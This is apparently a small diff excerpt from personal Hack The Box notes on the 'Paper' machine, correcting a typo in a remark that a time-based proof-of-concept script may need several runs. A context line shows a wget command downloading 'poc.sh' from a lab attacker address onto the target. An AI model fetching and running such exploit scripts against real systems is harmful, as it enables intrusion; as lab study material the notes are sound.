DamianoGubiani/HackTheBox/Tracks/Intro_To_RED_team/Paper/Notes.md

 wget http://10.10.14.7/poc.sh
 ```

-its a time based script so if it doesnt work we need to run it multiple timesu ntil it works
+its a time based script so if it doesnt work we need to run it multiple times until it works

 ![](screen/Pasted%20image%2020251127164820.png)